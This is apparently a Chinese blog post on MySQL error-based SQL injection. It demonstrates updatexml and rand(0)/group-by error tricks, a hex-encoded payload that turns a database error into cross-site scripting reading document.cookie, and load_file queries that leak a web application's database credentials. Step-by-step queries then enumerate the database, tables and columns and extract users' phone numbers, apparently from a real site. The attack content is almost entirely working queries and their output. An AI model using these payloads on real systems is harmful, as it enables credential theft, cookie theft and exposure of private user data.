报错是如何转为xss的?

mysql语句在页面报错,泄露信息

=========================================================================================================================================================================

*	报错方式之“updatexml”,有字数限制,但无需配合union。

	-	mysql> select updatexml(1, concat(':', 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: ':test'

	-	mysql> select updatexml(1, concat(0x3a, 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: ':test'

	-	mysql> select updatexml(1, concat(0x5e, 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: '^test'

	-	mysql>  select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);

			ERROR 1105 (HY000): XPATH syntax error: '^test'

	**	将上面‘test’换成你的子查询语句或函数均可。

*	group by+rand(0)+having,无字数限制,无需配合union。

	-	mysql>  select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);

			ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'

*	报错方式之“rand+count+group by”,需配合union

	rand(0)无论在哪台机器运行多少次,生成的序列都是一样的

	参考mysql开发者社区曝光的bug http://bugs.mysql.com/bug.php?id=8652

	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;

			ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'

	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

			ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'

	**	将上面‘test’换成你的子查询语句或函数均可。

mysql转xss语句

	mysql>  select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '/><img src="fuck" onerror=alert(document.cookie)>^0.7' for key 'group_key'

直接爆配置文件密码,前提是有file权限

	mysql>	select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_NAME'   => 'fan******un','

	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_USER'   => 's*********b', /'

	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':PWD'    => 'hahahaahhah','

爆版本

	mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;

		ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'

爆库名

	mysql> select info();

		ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist

	mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'

爆表名

	mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'

爆字段名

	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'

	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'

爆字段值

	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'

	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'

  

mysql基于“报错”的注入的更多相关文章

  1. sql注入--基于报错的注入

    这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学 ...

  2. 2019-9-9:渗透测试,基础学习,phpmyadmin getshell方法,基于时间的盲注,基于报错的注入,笔记

    phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-p ...

  3. MySQL基于报错注入2

    目标站点: 0x1 注入点判断 http://www.xxxxxx.com/pages/services.php?id=1 #true http://www.xxxxxx.com/pages/serv ...

  4. MySQL基于报错注入1

    0x1 判断注入点: http://www.xxxx.ro/s.php?id=1' 那么尝试闭合下单引号 http://www.xxxx.ro/s.php?id=1' --+ 0x2 枚举下表的列 h ...

  5. sqli-labs:1-4,基于报错的注入

    sqli1: 脚本 # -*- coding: utf-8 -*- """ Created on Sat Mar 23 09:37:14 2019 @author: ke ...

  6. Mysql报错型注入总结

    Mysql注入虽然是老生常谈的问题,但是工作中更多的是使用sqlmap等工具进行注入测试的,原理方面还是不是很清楚,所以这段时间主要是自己搭建环境在学手工注入,简单的将自己的学习做一个总结和记录.在常 ...

  7. python 3.5.2安装mysql驱动报错

    python 3.5.2安装mysql驱动报错 python 3.5.2安装mysql驱动时出现如下异常: [root@localhost www]# pip install mysql-connec ...

  8. Loadrunner参数化连接oracle、mysql数据源报错及解决办法

    Loadrunner参数化连接oracle.mysql数据源报错及解决办法 (本人系统是Win7 64,  两位小伙伴因为是默认安装lr,安装在 最终参数化的时候,出现连接字符串无法自动加载出来: 最 ...

  9. 连接mysql数据库报错java.sql.SQLException: The server time zone value '�й���׼ʱ��' is unrecognized...解决方法

    今天连接mysql数据库报错如下: java.sql.SQLException: The server time zone value '�й���׼ʱ��' is unrecognized or r ...

随机推荐

  1. 使用maven给spring项目打可直接运行的jar包(配置文件内置外置的打法)

    从网上看过许多打jar包的例子,大多是将配置文件打进jar包的.经过本人一番研究,终于搞清楚了怎样将jar包的配置文件外置. 废话不说,直接上spring的pom.xml的配置文件. <proj ...

  2. python爬虫学习(11) —— 也写个AC自动机

    0. 写在前面 本文记录了一个AC自动机的诞生! 之前看过有人用C++写过AC自动机,也有用C#写的,还有一个用nodejs写的.. C# 逆袭--自制日刷千题的AC自动机攻克HDU OJ HDU 自 ...

  3. TCP协议学习

    一.TCP参考模型  VS OSI参考模型 二.TCP/IP分层模型的四个协议层分别完成以下的功能 第一层 网络接口层 网络接口层包括用于协作IP数据在已有网络介质上传输的协议.实际上TCP/IP标准 ...

  4. AC日记——楼房 codevs 2995

    2995 楼房  时间限制: 1 s  空间限制: 256000 KB  题目等级 : 黄金 Gold 题解  查看运行结果     题目描述 Description 地平线(x轴)上有n个矩(lou ...

  5. 深度优先搜索(DFS)

    [算法入门] 郭志伟@SYSU:raphealguo(at)qq.com 2012/05/12 1.前言 深度优先搜索(缩写DFS)有点类似广度优先搜索,也是对一个连通图进行遍历的算法.它的思想是从一 ...

  6. CodeAtlas For Sublime Text

    CodeAtlas is a plugin of SublimeText, which allows one to explore the call graph conveniently. The p ...

  7. codevs 2830 蓬莱山辉夜

    2830 蓬莱山辉夜 http://codevs.cn/problem/2830/ 题目描述 Description 在幻想乡中,蓬莱山辉夜是月球公主,居住在永远亭上,二次设定说她成天宅在家里玩电脑, ...

  8. 使用WCF传输DataTable:DataTable和Xml格式的字符串相互转换(C#)

    背景:项目中要用到客户端向服务端传数据,使用WCF,绑定webHttpBinding,做了一个小例子. 业务逻辑简介:客户端在a表中添加了几条数据,从SQL Server数据库直接取出新添加的数据(D ...

  9. emoji表情 与 iconfont 一锅炖😂

    什么是emoji?

  10. 【BZOJ-1656】The Grove 树木 BFS + 射线法

    1656: [Usaco2006 Jan] The Grove 树木 Time Limit: 5 Sec  Memory Limit: 64 MBSubmit: 186  Solved: 118[Su ...